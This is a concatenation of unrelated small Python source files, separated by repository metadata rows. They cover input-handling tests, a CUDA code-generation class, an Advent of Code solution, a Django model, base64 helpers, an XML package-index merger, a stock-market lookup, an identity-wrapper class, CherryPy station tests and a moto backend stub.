            self.assert_in(description, self.stdout.getvalue())
            self.assert_equal('e8n0dpankpdvdni3kgac', value)

        with mock.patch(self._get_pathable_input(), return_value='e8n0dpankpdvdni3kgac'):
            value = input.text(description2)
            self.assert_in(description2, self.stdout.getvalue())
            self.assert_equal('e8n0dpankpdvdni3kgac', value)

    def test_default_empty(self):
        """
        Test default empty input
        :return: void
        """

        input = Input()

        with mock.patch(self._get_pathable_input(), return_value=''):
            value = input('')
            self.assert_is_none(value)

    def test_integer(self):
        """
        Test integer input
        :return: void
        """

        description = self.rand_str()
        input = Input()

        with mock.patch(self._get_pathable_input(), return_value='4815162342'):
            value = input.integer(description)
            self.assert_in(description, self.stdout.getvalue())
            self.assert_equal(4815162342, value)

    def test_integer_invalid(self):
        """
        Test integer invalid input
        :return: void
        """

        input = Input()

        with mock.patch(self._get_pathable_input(), return_value='Ygritte dies'):
            value = input.integer('')
            self.assert_is_none(value)

    def test_float(self):
        """
        Test float input
        :return: void
        """

        description = self.rand_str()
        input = Input()

        with mock.patch(self._get_pathable_input(), return_value='4.2'):
            value = input.float(description)
            self.assert_in(description, self.stdout.getvalue())
            self.assert_equal(4.2, value)

    def test_float_invalid(self):
        """
        Test float invalid input
        :return: void
        """

        input = Input()

        with mock.patch(self._get_pathable_input(), return_value='Peanut butter jelly time'):
            value = input.float('')
            self.assert_is_none(value)

    def test_yes_no(self):
        """
        Test yes_no input
        :return: void
        """

        description = self.rand_str()
        input = Input()

        with mock.patch(self._get_pathable_input(), return_value='y'):
            value = input.yes_no(description)
            self.assert_in(description, self.stdout.getvalue())
            self.assert_true(value)

    def test_yes_no_no(self):
        """
        Test yes_no no input
        :return: void
        """

        input = Input()

        with mock.patch(self._get_pathable_input(), return_value='n'):
            value = input.yes_no('')
            self.assert_false(value)

    def test_yes_no_invalid(self):
        """
        Test yes_no invalid input
        :return: void
        """

        input = Input()

        with mock.patch(self._get_pathable_input(), return_value='Indiana Jones dies in Star Wars'):
            value = input.yes_no('')
            self.assert_false(value)

    def test_pick(self):
        """
        Test pick input
        :return: void
        """

        description = self.rand_str()
        options = [
            'May the',
            'odds ever',
            'be in your',
            'favour'
        ]
        input = Input()

        with mock.patch(self._get_pathable_input(), return_value='2'):
            value = input.pick(options, description)
            self.assert_in(description, self.stdout.getvalue())
            self.assert_equal(2, value)

    def test_pick_out_of_range(self):
        """
        Test pick out of range input
        :return: void
        """

        description = self.rand_str()
        options = [
            'May the',
            'odds ever',
            'be in your',
            'favour'
        ]
        input = Input()

        with mock.patch(self._get_pathable_input(), return_value='6'):
            value = input.pick(options, description)
            self.assert_in(description, self.stdout.getvalue())
            self.assert_is_none(value)

    def test_pick_invalid(self):
        """
        Test pick invalid input
        :return: void
        """

        description = self.rand_str()
        options = [
            'May the',
            'odds ever',
            'be in your',
            'favour'
        ]
        input = Input()

        with mock.patch(self._get_pathable_input(), return_value='Scoobiedoobiedoo'):
            value = input.pick(options, description)
            self.assert_in(description, self.stdout.getvalue())
            self.assert_is_none(value)

    def _get_pathable_input(self):
        """
        Get the patchable input
        :return: Patchable input
        """

        if sys.version_info < (3, 0):
            return '__builtin__.raw_input'
        else:
            return 'builtins.input'
| 25.564593 | 100 | 0.561669 | 570 | 5,343 | 5.045614 | 0.14386 | 0.099444 | 0.077886 | 0.076843 | 0.735049 | 0.703408 | 0.703408 | 0.659944 | 0.631085 | 0.631085 | 0 | 0.012239 | 0.327157 | 5,343 | 208 | 101 | 25.6875 | 0.787761 | 0.097511 | 0 | 0.53271 | 0 | 0 | 0.07041 | 0.004754 | 0 | 0 | 0 | 0 | 0.196262 | 1 | 0.121495 | false | 0 | 0.037383 | 0 | 0.186916 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
56ee0f2b7c20549c27468c938496b4dd2926bdef | 1,803 | py | Python | gemmforge/vm/lexic/cuda_lexic.py | ravil-mobile/gemmforge | 6381584c2d1ce77eaa938de02bc4f130f19cb2e4 | [
"MIT"
] | null | null | null | gemmforge/vm/lexic/cuda_lexic.py | ravil-mobile/gemmforge | 6381584c2d1ce77eaa938de02bc4f130f19cb2e4 | [
"MIT"
] | 2 | 2021-02-01T16:31:22.000Z | 2021-05-05T13:44:43.000Z | gemmforge/vm/lexic/cuda_lexic.py | ravil-mobile/gemmforge | 6381584c2d1ce77eaa938de02bc4f130f19cb2e4 | [
"MIT"
] | null | null | null | from .lexic import Lexic
class CudaLexic(Lexic):
    def __init__(self, underlying_hardware):
        super().__init__(underlying_hardware)
        self.thread_idx_y = "threadIdx.y"
        self.thread_idx_x = "threadIdx.x"
        self.thread_idx_z = "threadIdx.z"
        self.block_idx_x = "blockIdx.x"
        self.block_dim_y = "blockDim.y"
        self.block_dim_z = "blockDim.z"
        self.stream_name = "cudaStream_t"

    def get_launch_code(self, func_name, grid, block, stream, func_params):
        return "kernel_{}<<<{},{},0,{}>>>({})".format(func_name, grid, block, stream, func_params)

    def declare_shared_memory_inline(self, name, precision, size, alignment):
        return f"__shared__ __align__({alignment}) {precision} {name}[{size}]"

    def kernel_definition(self, file, kernel_bounds, base_name, params, precision=None,
                          total_shared_mem_size=None):
        return file.CudaKernel(base_name, params, kernel_bounds)

    def sync_threads(self):
        return "__syncthreads()"

    def sync_vec_unit(self):
        return "__syncwarp()"

    def kernel_range_object(self):
        return "dim3"

    def get_stream_via_pointer(self, file, stream_name, pointer_name):
        if_stream_exists = f'({pointer_name} != nullptr)'
        stream_obj = f'static_cast<{self.stream_name}>({pointer_name})'
        file(f'{self.stream_name} stream = {if_stream_exists} ? {stream_obj} : 0;')

    def check_error(self):
        return "CHECK_ERR"

    def batch_indexer_gemm(self):
        return self.get_tid_counter(self.thread_idx_y, self.block_dim_y, self.block_idx_x)

    def batch_indexer_csa(self):
        return self.get_tid_counter(self.thread_idx_z, self.block_dim_z, self.block_idx_x)

    def batch_indexer_init(self):
        return self.get_tid_counter(self.thread_idx_y, self.block_dim_y, self.block_idx_x)

    def get_headers(self):
        return []
| 33.388889 | 94 | 0.719357 | 261 | 1,803 | 4.555556 | 0.302682 | 0.068124 | 0.065601 | 0.043734 | 0.253154 | 0.240538 | 0.240538 | 0.151388 | 0.151388 | 0.117746 | 0 | 0.00197 | 0.155297 | 1,803 | 53 | 95 | 34.018868 | 0.778726 | 0 | 0 | 0.052632 | 0 | 0 | 0.191348 | 0.054354 | 0 | 0 | 0 | 0 | 0 | 1 | 0.342105 | false | 0 | 0.026316 | 0.289474 | 0.684211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
56f802ddb06776d60b8cfd73fb56d6e4e6bc9fde | 115 | py | Python | run.py | KirtusJ/BirdBot | 4440364caefa6ec9acf1bc7cf38605b1d90de20e | [
"MIT"
] | null | null | null | run.py | KirtusJ/BirdBot | 4440364caefa6ec9acf1bc7cf38605b1d90de20e | [
"MIT"
] | null | null | null | run.py | KirtusJ/BirdBot | 4440364caefa6ec9acf1bc7cf38605b1d90de20e | [
"MIT"
] | null | null | null |

from src import app
try:
    app.bot.run(app.env['token'], bot=True, reconnect=True)
except Exception as e:
    print(e)
56fc3e621ad547315451aaef15d494aaa7729aca | 543 | py | Python | 15.py | ednl/aoc2017 | 429cec4e8e89bed375bc40989d7c8bab609cc4b1 | [
"MIT"
] | null | null | null | 15.py | ednl/aoc2017 | 429cec4e8e89bed375bc40989d7c8bab609cc4b1 | [
"MIT"
] | null | null | null | 15.py | ednl/aoc2017 | 429cec4e8e89bed375bc40989d7c8bab609cc4b1 | [
"MIT"
] | null | null | null |

def duel1(a, b, c):
    k = 0
    for _ in range(c):
        a = a * 16807 % 2147483647
        b = b * 48271 % 2147483647
        k += a & 0xffff == b & 0xffff
    return k


def duel2(a, b, c):
    k = 0
    for _ in range(c):
        a = a * 16807 % 2147483647
        while a & 0x3:
            a = a * 16807 % 2147483647
        b = b * 48271 % 2147483647
        while b & 0x7:
            b = b * 48271 % 2147483647
        k += a & 0xffff == b & 0xffff
    return k


print(duel1(783, 325, 40_000_000))
print(duel2(783, 325, 5_000_000))
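For a quick sanity check, duel1 can be exercised with the Advent of Code 2017 day 15 sample seeds (65 and 8921), where the low 16 bits of the two generators first match on the third pair; the constants 16807, 48271, and 2147483647 are the same as in the file above:

```python
def duel1(a, b, c):
    # Same judge as above: count rounds whose low 16 bits agree.
    k = 0
    for _ in range(c):
        a = a * 16807 % 2147483647
        b = b * 48271 % 2147483647
        k += a & 0xffff == b & 0xffff
    return k

# Sample seeds from the puzzle statement; only the third pair matches.
print(duel1(65, 8921, 5))  # 1
```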
56fc6c4a86f3fdad8466b50419d8abe83ba31c2a | 244 | py | Python | todos/models.py | DastanArysbay/TodoAppProject | 2c23902dddaa2343a965a946e05dfa6d7f9174b3 | [
"MIT"
] | null | null | null | todos/models.py | DastanArysbay/TodoAppProject | 2c23902dddaa2343a965a946e05dfa6d7f9174b3 | [
"MIT"
] | null | null | null | todos/models.py | DastanArysbay/TodoAppProject | 2c23902dddaa2343a965a946e05dfa6d7f9174b3 | [
"MIT"
] | 1 | 2022-01-20T20:49:15.000Z | 2022-01-20T20:49:15.000Z |

from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Todo(models.Model):
    # user = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)
    content = models.TextField()
711b77572e237349a6536ce5916b8d9b6a2f7e76 | 151 | py | Python | prac/20200526/wrap.py | yaroslavKonst/PythonPracticum | 2215b169252b6d429f1f38e5f2295d1435256785 | [
"Apache-2.0"
] | 2 | 2020-04-10T22:09:19.000Z | 2020-04-10T22:09:24.000Z | prac/20200526/wrap.py | yaroslavKonst/PythonPracticum | 2215b169252b6d429f1f38e5f2295d1435256785 | [
"Apache-2.0"
] | null | null | null | prac/20200526/wrap.py | yaroslavKonst/PythonPracticum | 2215b169252b6d429f1f38e5f2295d1435256785 | [
"Apache-2.0"
] | null | null | null |

import sys
import subprocess
ex = sys.executable
print(subprocess.run([ex, sys.argv[1], *sys.argv[2:]], capture_output=True).stdout.decode("UTF-8"))
71202e3a141442b569da6b6d00f74b92142a8ac2 | 522 | py | Python | python/helpers.py | DuckLov3r/sovrin-whs | 3f2c9e6749834e1abde26d3acc8ce9312564534a | [
"Apache-2.0"
] | 1 | 2018-10-22T19:43:16.000Z | 2018-10-22T19:43:16.000Z | python/helpers.py | DuckLov3r/sovrin-whs | 3f2c9e6749834e1abde26d3acc8ce9312564534a | [
"Apache-2.0"
] | 2 | 2020-07-17T03:35:07.000Z | 2021-05-08T23:22:31.000Z | python/helpers.py | DuckLov3r/sovrin-whs | 3f2c9e6749834e1abde26d3acc8ce9312564534a | [
"Apache-2.0"
] | 2 | 2019-05-30T06:56:20.000Z | 2019-11-05T16:39:59.000Z |

import base64
def serialize_bytes_json(data: bytes) -> str:
    data_b64_encoded = base64.b64encode(data)
    data_b64_encoded_str = data_b64_encoded.decode('utf-8')
    return data_b64_encoded_str


def deserialize_bytes_json(b64_encoded: bytes) -> str:
    b64_decoded = base64.b64decode(b64_encoded)
    b64_decoded_str = b64_decoded.decode('utf-8')
    return b64_decoded_str


def str_to_bytes(data: str) -> bytes:
    return str.encode(data)


def bytes_to_str(data: bytes) -> str:
    return data.decode('utf-8')
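A round-trip sketch of the two serialization helpers (assuming deserialize_bytes_json is meant to return the decoded text, as its `-> str` annotation indicates; note `base64.b64decode` returns bytes, so the result must be decoded, not encoded):

```python
import base64

def serialize_bytes_json(data: bytes) -> str:
    return base64.b64encode(data).decode('utf-8')

def deserialize_bytes_json(b64_encoded: bytes) -> str:
    return base64.b64decode(b64_encoded).decode('utf-8')

encoded = serialize_bytes_json(b'hello')
print(encoded)                                   # aGVsbG8=
print(deserialize_bytes_json(encoded.encode()))  # hello
```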
852fb825fe263ec82f820da72ee2a339cf8935c0 | 1,036 | py | Python | main.py | RandomReaper/cloudio-endpoint-python-example | ec8aa8f4e745072e67ef5fdee1a3d3910848a237 | [
"Apache-2.0"
] | null | null | null | main.py | RandomReaper/cloudio-endpoint-python-example | ec8aa8f4e745072e67ef5fdee1a3d3910848a237 | [
"Apache-2.0"
] | null | null | null | main.py | RandomReaper/cloudio-endpoint-python-example | ec8aa8f4e745072e67ef5fdee1a3d3910848a237 | [
"Apache-2.0"
] | null | null | null |

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from client import Sample_Client
import time
import random
# Create client
client = Sample_Client('sample.cfg')
time.sleep(5)
# Simple example
while True:
    print('Sending updates')
    client.publish('Sensor1', 'L1_Volts', random.uniform(207, 253))
    client.publish('Sensor1', 'L2_Volts', random.uniform(207, 253))
    client.publish('Sensor1', 'L3_Volts', random.uniform(207, 253))
    client.publish('Sensor1', 'L1_Amps', random.uniform(1, 2))
    client.publish('Sensor1', 'L2_Amps', random.uniform(1, 2))
    client.publish('Sensor1', 'L3_Amps', random.uniform(1, 2))
    client.publish('Sensor2', 'L1_Volts', random.uniform(207, 253))
    client.publish('Sensor2', 'L2_Volts', random.uniform(207, 253))
    client.publish('Sensor2', 'L3_Volts', random.uniform(207, 253))
    client.publish('Sensor2', 'L1_Amps', random.uniform(1, 2) / 2)
    client.publish('Sensor2', 'L2_Amps', random.uniform(1, 2) / 2)
    client.publish('Sensor2', 'L3_Amps', random.uniform(1, 2) / 2)
    time.sleep(60)
8547d29f5b4d30e3e1f440fdaabe2db21e5b21af | 8,070 | py | Python | 60-Publish/combine_packages_xml.py | marble/Toolchain_RenderDocumentation | 1b206c0478b7418a628233e9e1fd36eeb4224185 | [
"MIT"
] | null | null | null | 60-Publish/combine_packages_xml.py | marble/Toolchain_RenderDocumentation | 1b206c0478b7418a628233e9e1fd36eeb4224185 | [
"MIT"
] | 9 | 2016-09-05T19:24:57.000Z | 2018-12-05T16:11:55.000Z | 60-Publish/combine_packages_xml.py | marble/Toolchain_RenderDocumentation | 1b206c0478b7418a628233e9e1fd36eeb4224185 | [
"MIT"
] | 2 | 2017-04-08T10:12:48.000Z | 2020-08-14T13:10:42.000Z |

#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""Integrate two files known as 'packages.xml'.

Usage:
    python combine_packages_xml.py FPATH_1 FPATH_2 >result.xml

Description:
    The script reads FPATH_1 and updates the data with FPATH_2.
    Entries are sorted by 'version+language'. The file timestamp
    is set to 'now'. The result is printed to stdout.
"""
from __future__ import print_function
from __future__ import absolute_import
import codecs
import datetime
import re
import sys
import time
if not __name__ == "__main__":
    print('Please run as main.')
    sys.exit(1)


def usage(exitcode=0):
    print(__doc__)
    sys.exit(exitcode)


def usage1(exitcode=1):
    lines = __doc__.split('\n')
    print('\n'.join(lines[2:4] + [' Try --help']))
    sys.exit(exitcode)


if len(sys.argv) == 1 or '--help' in sys.argv:
    usage()

if len(sys.argv) != 3:
    usage1()
fpath1 = sys.argv[1]
fpath2 = sys.argv[2]
unixtime = int(time.time())
dt = datetime.datetime.fromtimestamp(unixtime)
datetimestr = dt.strftime('%Y-%m-%d %H:%M:%S')
example_data = """
<?xml version="1.0" standalone="yes" ?>
<documentationPackIndex>
<meta>
<timestamp>1493982096</timestamp>
<date>2017-05-05 13:01:36</date>
</meta>
<languagePackIndex>
<languagepack version="0.4.0" language="default">
<md5>7c5890efa98d8184f2004a5d219bb57b</md5>
</languagepack>
<languagepack version="0.5.0" language="default">
<md5>cad89b3359498d070e75247b9e974eb2</md5>
</languagepack>
<languagepack version="0.6.0" language="default">
<md5>fd8f805fef1bdf748de32e430ccd08d6</md5>
</languagepack>
<languagepack version="1.0.0" language="default">
<md5>c98885a6a82329c48d35ba1be06c62c2</md5>
</languagepack>
<languagepack version="1.1.0" language="default">
<md5>8a20f8337c2dd3cadeeab46544826177</md5>
</languagepack>
<languagepack version="1.1.0" language="fr_FR">
<md5>2725397412083343c57bad8a706257cf</md5>
</languagepack>
<languagepack version="1.1.1" language="default">
<md5>567f4fa8883766acf58ad529bd28f165</md5>
</languagepack>
<languagepack version="1.1.1" language="fr_FR">
<md5>20fd95af62d5bee7bab4b20e20752923</md5>
</languagepack>
<languagepack version="1.2.0" language="default">
<md5>d82077b4e25ebd4d3ff2d6568006310c</md5>
</languagepack>
<languagepack version="1.2.0" language="fr_FR">
<md5>a2fecd2e4a43e7103dca6a7800990519</md5>
</languagepack>
<languagepack version="1.2.1" language="default">
<md5>9c0d59e8ca0224417f4cc50d1137b989</md5>
</languagepack>
<languagepack version="1.2.1" language="fr_FR">
<md5>7b64db2f3632f15639c5c1b0b6853962</md5>
</languagepack>
<languagepack version="1.2.2" language="default">
<md5>5b269fc51aab30596267e40f65494ab3</md5>
</languagepack>
<languagepack version="1.2.2" language="fr_FR">
<md5>12cc312274ccc74836218a4a1c4fe367</md5>
</languagepack>
<languagepack version="1.3.0" language="default">
<md5>1b9ff0511b50f89220efa4dae402d7f2</md5>
</languagepack>
<languagepack version="1.3.0" language="fr_FR">
<md5>6ce32d8a414aaeabfa706483e7799b46</md5>
</languagepack>
<languagepack version="1.3.1" language="default">
<md5>13079fb01792655184bf71650938b308</md5>
</languagepack>
<languagepack version="1.3.1" language="fr_FR">
<md5>4edf4b024b394135152bd204bfaff2f5</md5>
</languagepack>
<languagepack version="1.3.2" language="default">
<md5>c6338fb4fc2e5178184cf6ad65eefcfe</md5>
</languagepack>
<languagepack version="1.3.2" language="fr_FR">
<md5>6a8ed5d22a808487a8217844f5b0c500</md5>
</languagepack>
<languagepack version="2.0.0" language="default">
<md5>1d079e747c8b2f4c0b589712c13427be</md5>
</languagepack>
<languagepack version="2.0.0" language="fr_FR">
<md5>c3cf49cfdc8a0e29d10832a4344e91e7</md5>
</languagepack>
<languagepack version="2.0.1" language="default">
<md5>76abdd02fa068e8074815b36d8e460d3</md5>
</languagepack>
<languagepack version="2.0.1" language="fr_FR">
<md5>4bf4dcda2a6e74d34479503543137ad5</md5>
</languagepack>
<languagepack version="2.1.0" language="default">
<md5>f08a233da48eacb10c47922805afd249</md5>
</languagepack>
<languagepack version="2.1.0" language="fr_FR">
<md5>6584398fcc9e7f5a546722da5a103d26</md5>
</languagepack>
<languagepack version="2.2.0" language="default">
<md5>b982d16982626a60d0afd175a42b8938</md5>
</languagepack>
<languagepack version="2.2.0" language="fr_FR">
<md5>7333f623ee0452401d653818c1e5a8de</md5>
</languagepack>
<languagepack version="2.2.1" language="default">
<md5>15c025915b4106418dabdb19ef67d24b</md5>
</languagepack>
<languagepack version="2.2.1" language="fr_FR">
<md5>d4160de05bde35f2217558b57adba429</md5>
</languagepack>
<languagepack version="2.2.2" language="default">
<md5>9af5abd5ebf7278bcc456ccc1cc23b63</md5>
</languagepack>
<languagepack version="2.2.2" language="fr_FR">
<md5>3609e8f2052ff03d27eabfd52991b9f8</md5>
</languagepack>
<languagepack version="2.2.3" language="default">
<md5>fe6d78a9e3deed8ff43f9424dd3272f7</md5>
</languagepack>
<languagepack version="2.2.3" language="fr_FR">
<md5>f39b898bf9efedfbbf8b670e7ce7bb88</md5>
</languagepack>
<languagepack version="2.3.0" language="default">
<md5>d4f85ecaf4f6a0c83cfcf5e68dcd7a0f</md5>
</languagepack>
<languagepack version="2.3.0" language="fr_FR">
<md5>37428948f560597acf8ed45fdfb3da98</md5>
</languagepack>
<languagepack version="2.3.1" language="default">
<md5>152b3e2f0645fd2e8c9c08fcc2e8862b</md5>
</languagepack>
<languagepack version="2.3.1" language="fr_FR">
<md5>c36846d36aea5225e54260892eccc24b</md5>
</languagepack>
<languagepack version="2.4.0" language="default">
<md5>e7db74af568ddc646ee6e7388dbbe110</md5>
</languagepack>
<languagepack version="2.4.0" language="fr_FR">
<md5>55dab560775a957acb32f3edb23d439a</md5>
</languagepack>
<languagepack version="2.5.0" language="default">
<md5>2d8aedc81bca14a3077a474299b64af6</md5>
</languagepack>
<languagepack version="2.5.0" language="fr_FR">
<md5>ebdcb836634fb3c0cb57d8b4d1c745da</md5>
</languagepack>
<languagepack version="2.5.1" language="default">
<md5>26ae6128e32b5e5567b4fb52f8b5a2d2</md5>
</languagepack>
<languagepack version="2.5.1" language="fr_FR">
<md5>c371f7323107d00de9c9172e5a51f05a</md5>
</languagepack>
</languagePackIndex>
</documentationPackIndex>
"""
prolog_template = """\
<?xml version="1.0" standalone="yes" ?>
<documentationPackIndex>
<meta>
<timestamp>%(unixtime)s</timestamp>
<date>%(datetimestr)s</date>
</meta>
<languagePackIndex>"""
languagepack = """\
<languagepack version="%(version)s" language="%(language)s">
<md5>%(md5)s</md5>
</languagepack>"""
epilog = """\
</languagePackIndex>
</documentationPackIndex>"""
re_obj = re.compile('''
<languagepack
\\s+
version="(?P<version>\d+\.\d+\.\d+)"
\\s+
language="(?P<language>[a-zA-Z-_]*)"\\s*.
\\s*<md5>(?P<md5>[a-f0-9]*)</md5>
''', re.VERBOSE + re.DOTALL)
def version_tuple(v):
    return tuple([int(part) for part in v.split('.') if part.isdigit()])


def version_cmp(a, b):
    return cmp(version_tuple(a), version_tuple(b))


def getversions(fpath):
    result = {}
    with codecs.open(fpath, 'r', 'utf-8') as f1:
        data = f1.read()
    for m in re_obj.finditer(data):
        k = '%s,%s' % (m.group('version'), m.group('language'))
        result[k] = {
            'version': m.group('version'),
            'language': m.group('language'),
            'md5': m.group('md5')
        }
    return result


def version_cmp(a, b):
    result = cmp(version_tuple(a[1]['version']), version_tuple(b[1]['version']))
    if result == 0:
        result = cmp(a[1]['language'], b[1]['language'])
    return result
versions1 = getversions(fpath1)
versions2 = getversions(fpath2)
versions3 = versions1.copy()
versions3.update(versions2)
print(prolog_template % {'unixtime': unixtime, 'datetimestr': datetimestr})
for k, v in sorted(list(versions3.items()), cmp=version_cmp):
    print(languagepack % v)
print(epilog)
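The reason for version_tuple is that lexicographic string sorting misorders multi-digit version components; a standalone illustration (using Python 3's key= in place of the script's Python 2 cmp=):

```python
def version_tuple(v):
    # Split '2.10.0' into (2, 10, 0) so components compare numerically.
    return tuple(int(part) for part in v.split('.') if part.isdigit())

versions = ['2.10.0', '2.2.3', '2.9.1']
print(sorted(versions))                     # ['2.10.0', '2.2.3', '2.9.1'] -- wrong order
print(sorted(versions, key=version_tuple))  # ['2.2.3', '2.9.1', '2.10.0']
```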
8586f20d81d871dcccdebbc919a4ef229a83d7c5 | 978 | py | Python | ai2business/datasets/sample_generator.py | SimonBOai/ai2business | 68b5e63841e2636310095184b453fe6450baf372 | [
"Apache-2.0"
] | null | null | null | ai2business/datasets/sample_generator.py | SimonBOai/ai2business | 68b5e63841e2636310095184b453fe6450baf372 | [
"Apache-2.0"
] | 24 | 2020-12-03T07:47:42.000Z | 2020-12-19T16:38:01.000Z | ai2business/datasets/sample_generator.py | Anselmoo/ai2business | 98af02afe5317e6a6271528e062f00118396645f | [
"Apache-2.0"
] | null | null | null |

"""Generates sample list of KPIs"""
from ai2business.datasets.data import database
class SampleGenerators:
    """Sample Generators allows generating keyword lists.

    !!! example
        The module `sample_generator.py` contains functions which allow generating a list of
        keywords with and without acronyms.

        ```python
        # Get ticker values of the leading stock markets worldwide.
        stock_market(indices: str = "DOWJONES") -> dict
        ```
    """

    pass


def stock_market(indices: str = "DOWJONES") -> dict:
    """Returns all company names and ISIN for a given stock market.

    Args:
        indices (str, optional): Name of the stock market. Defaults to "DOWJONES".

    Returns:
        dict: Collection of the indices of the current stock market.
    """
    try:
        return database.StockMarket.__dict__[indices.lower()]
    except KeyError as exc:
        print(f"ERROR: {exc} -> Indices is not listed in the database!")
        return {}
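The attribute lookup inside stock_market — reading class attributes via `__dict__` with a KeyError fallback — can be sketched standalone; the StockMarket class and its ticker contents here are hypothetical stand-ins for the real database module:

```python
class StockMarket:
    # Hypothetical stand-in for ai2business.datasets.data.database.StockMarket.
    dowjones = {"AAPL": "US0378331005", "MSFT": "US5949181045"}

def stock_market(indices: str = "DOWJONES") -> dict:
    try:
        # Class attributes double as the lookup table, keyed by lowercase name.
        return StockMarket.__dict__[indices.lower()]
    except KeyError as exc:
        print(f"ERROR: {exc} -> Indices is not listed in the database!")
        return {}

print(stock_market("DOWJONES")["AAPL"])  # US0378331005
print(stock_market("NIKKEI"))            # {} (after printing an error)
```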
85898d0127c4615b70c92c5404cf93317797aa04 | 1,353 | py | Python | identityholder.py | BenNordick/HiLoop | 07d20ce872b2d50c3dbd5d34f05d99f7e0c49a2e | [
"MIT"
] | 1 | 2021-07-30T02:42:35.000Z | 2021-07-30T02:42:35.000Z | identityholder.py | BenNordick/HiLoop | 07d20ce872b2d50c3dbd5d34f05d99f7e0c49a2e | [
"MIT"
] | null | null | null | identityholder.py | BenNordick/HiLoop | 07d20ce872b2d50c3dbd5d34f05d99f7e0c49a2e | [
"MIT"
] | 1 | 2022-01-26T11:45:52.000Z | 2022-01-26T11:45:52.000Z |

class IdentityHolder:
    """Wraps an object so that it can be quickly compared by object identity rather than value.

    Also provides a total order based on object address.

    This is frequently useful for sets representing cycles: set value equality is O(n) but object identity equality is O(1).
    Different cycles can have the same nodes in a different order; it is important to distinguish these objects, but useful
    to represent them as sets for purposes of fast intersection.
    """

    def __init__(self, value, tag=None):
        """Wrap a value, optionally tagged with extra information."""
        self.value = value
        self.tag = tag

    def __hash__(self):
        return id(self.value)

    def __eq__(self, other):
        return self.value is other.value

    def __str__(self):
        return 'IH`' + str(self.value) + '`'

    def __repr__(self):
        return 'IdentityHolder(' + repr(self.value) + ', ' + repr(self.tag) + ')'

    def order(self, other):
        """Return a tuple of this holder and the other such that the first item is before the second in a total order."""
        return (self, other) if self.isbefore(other) else (other, self)

    def isbefore(self, other):
        """Determine whether this holder is before the other in a total order."""
        return id(self.value) < id(other.value)
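The identity-versus-value distinction described in the docstring can be demonstrated with a minimal stand-in (re-defined here so the snippet is self-contained):

```python
class Holder:
    # Minimal stand-in mirroring IdentityHolder's hash/eq semantics.
    def __init__(self, value, tag=None):
        self.value = value
        self.tag = tag

    def __hash__(self):
        return id(self.value)

    def __eq__(self, other):
        return self.value is other.value

cycle = frozenset({1, 2, 3})
copy_of_cycle = frozenset({1, 2, 3})  # equal by value, distinct object

a, b, c = Holder(cycle), Holder(cycle), Holder(copy_of_cycle)
print(a == b)  # True: both wrap the very same object
print(a == c)  # False: equal values but different objects
```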
858bb8166e2d1dd3ef4f31caed28313a875347b9 | 2,212 | py | Python | tests/station_test.py | RobMackie/CheckMeIn | 2cb66b4fff7259fa038a2754878056af9dbca6f4 | [
"MIT"
] | 1 | 2020-10-22T13:22:39.000Z | 2020-10-22T13:22:39.000Z | tests/station_test.py | RobMackie/CheckMeIn | 2cb66b4fff7259fa038a2754878056af9dbca6f4 | [
"MIT"
] | 34 | 2018-07-05T18:18:37.000Z | 2022-03-12T01:01:03.000Z | tests/station_test.py | RobMackie/CheckMeIn | 2cb66b4fff7259fa038a2754878056af9dbca6f4 | [
"MIT"
] | 1 | 2021-09-06T04:12:43.000Z | 2021-09-06T04:12:43.000Z |

import CPtest
class StationTest(CPtest.CPTest):
    def test_station(self):
        self.getPage("/station/")
        self.assertStatus('200 OK')

    def test_scanned_success(self):
        self.getPage("/station/scanned?barcode=100090")
        self.assertStatus('303 See Other')

    def test_scanned_success2(self):  # if before made in, this should make out
        self.getPage("/station/scanned?barcode=100090")
        self.assertStatus('303 See Other')

    def test_checkin(self):
        self.getPage("/station/checkin?barcode=100091")
        self.assertStatus('303 See Other')

    def test_checkout(self):
        self.getPage("/station/checkout?barcode=100090")
        self.assertStatus('303 See Other')

    def test_docs(self):
        self.getPage("/docs")
        self.assertStatus('200 OK')

    def test_bulkUpdate(self):
        self.getPage(
            "/station/bulkUpdate?inBarcodes=100090+100091&outBarcodes=")
        self.assertStatus('303 See Other')

    def test_bulkUpdateAllOut(self):
        self.getPage("/admin/emptyBuilding")
        self.getPage("/station/makeKeyholder?barcode=100091")
        self.getPage(
            "/station/bulkUpdate?inBarcodes=100090+100091&outBarcodes=")
        self.getPage(
            "/station/bulkUpdate?inBarcodes=&outBarcodes=100090+100091")
        self.assertStatus('303 See Other')

    def test_scanned_bogus(self):
        self.getPage("/station/scanned?barcode=0090")
        self.assertStatus('303 See Other')

    def test_scanned_keyholder_from_station(self):
        self.getPage("/station/scanned?barcode=999901")
        self.assertStatus('200 OK')

    def test_makeKeyholder(self):
        self.getPage("/station/makeKeyholder?barcode=100090")
        self.assertStatus('303 See Other')

    def test_scanned_keyholder_from_keyholder(self):
        self.getPage("/station/keyholder?barcode=999901")
        self.assertStatus('303 See Other')

    def test_scanned_from_keyholder(self):
        self.getPage("/station/keyholder?barcode=100091")
        self.assertStatus('303 See Other')

    def test_scanned_failure(self):
        self.getPage("/station/scanned?barcode=fail")
        self.assertStatus('303 See Other')
85908c15afe587db8551deda3b4c239f8d42664e | 145 | py | Python | moto/instance_metadata/models.py | chiemerieezechukwu/moto | 07b7d77611d345a99a253c366529822e1cc0b1ff | [
"Apache-2.0"
] | null | null | null | moto/instance_metadata/models.py | chiemerieezechukwu/moto | 07b7d77611d345a99a253c366529822e1cc0b1ff | [
"Apache-2.0"
] | null | null | null | moto/instance_metadata/models.py | chiemerieezechukwu/moto | 07b7d77611d345a99a253c366529822e1cc0b1ff | [
"Apache-2.0"
] | null | null | null |

from moto.core import BaseBackend
class InstanceMetadataBackend(BaseBackend):
    pass
instance_metadata_backend = InstanceMetadataBackend()
